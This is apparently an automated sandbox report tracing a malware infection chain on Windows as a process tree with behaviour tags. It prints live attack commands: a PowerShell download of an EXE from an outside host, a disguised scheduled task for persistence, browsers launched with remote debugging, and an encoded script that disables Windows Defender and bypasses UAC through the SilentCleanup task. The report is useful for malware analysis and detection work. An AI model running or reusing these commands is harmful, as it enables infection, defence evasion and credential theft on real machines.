C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe"C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe"8⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3076 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe10⤵PID:1140
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"8⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4052
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6524 -
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"9⤵
- Executes dropped EXE
PID:6860
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 8049⤵
- Program crash
PID:7020
-
-
-
C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6632 -
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6800
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵PID:3160
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:5580
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
PID:6180 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd4,0x108,0x7ffdc8a6dcf8,0x7ffdc8a6dd04,0x7ffdc8a6dd1011⤵PID:5620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2100 /prefetch:311⤵PID:6640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2072,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2068 /prefetch:211⤵PID:6800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2376 /prefetch:811⤵PID:1184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3248 /prefetch:111⤵
- Uses browser remote debugging
PID:7092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3308 /prefetch:111⤵
- Uses browser remote debugging
PID:2084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4324 /prefetch:211⤵
- Uses browser remote debugging
PID:2940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4700 /prefetch:111⤵
- Uses browser remote debugging
PID:6500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5152,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5164 /prefetch:811⤵PID:6248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5512,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5524 /prefetch:811⤵PID:4680
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
PID:7128 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffdb754f208,0x7ffdb754f214,0x7ffdb754f22011⤵PID:6132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1952,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=2560 /prefetch:311⤵PID:7060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2524,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:211⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1768,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=2568 /prefetch:811⤵PID:6788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:111⤵
- Uses browser remote debugging
PID:4836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:111⤵
- Uses browser remote debugging
PID:7148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=4172,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=4780 /prefetch:211⤵PID:2400
-
-
-
C:\ProgramData\rqi589zcba.exe"C:\ProgramData\rqi589zcba.exe"10⤵PID:5936
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:2060
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:6452
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:5304
-
-
-
C:\ProgramData\gdtrimy5xl.exe"C:\ProgramData\gdtrimy5xl.exe"10⤵PID:4352
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:4404
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:1976
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:912
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:3904
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:6920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 129212⤵
- Program crash
PID:16620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 134012⤵
- Program crash
PID:16772
-
-
-
-
C:\ProgramData\2nop8qimgv.exe"C:\ProgramData\2nop8qimgv.exe"10⤵PID:4316
-
C:\Users\Admin\AppData\Local\Temp\rOWktlhh\fpHHCwN8RAi9TDj5.exeC:\Users\Admin\AppData\Local\Temp\rOWktlhh\fpHHCwN8RAi9TDj5.exe 011⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\rOWktlhh\a3DpRp3jBTeNsqQJ.exeC:\Users\Admin\AppData\Local\Temp\rOWktlhh\a3DpRp3jBTeNsqQJ.exe 518412⤵PID:6692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6692 -s 67613⤵
- Program crash
PID:16496
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5184 -s 92012⤵
- Program crash
PID:16488
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\eua1n" & exit10⤵PID:16688
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1111⤵
- Delays execution with timeout.exe
PID:17328
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"8⤵PID:3708
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:5364
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:3108
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:5480
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"8⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"9⤵PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"9⤵PID:6036
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"9⤵PID:6368
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"9⤵PID:6676
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"9⤵PID:720
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028880101\d87c2502d6.exe"C:\Users\Admin\AppData\Local\Temp\10028880101\d87c2502d6.exe"8⤵PID:4196
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"9⤵PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028890101\a5175ec3d5.exe"C:\Users\Admin\AppData\Local\Temp\10028890101\a5175ec3d5.exe"8⤵PID:2480
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"9⤵PID:2072
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3616
-
-
C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3160
-
-
C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3584 -
C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"7⤵
- Executes dropped EXE
PID:1992
-
-
C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2624
-
-
-
C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:2752 -
C:\Users\Admin\AppData\Roaming\ejrEdhQT0y.exe"C:\Users\Admin\AppData\Roaming\ejrEdhQT0y.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
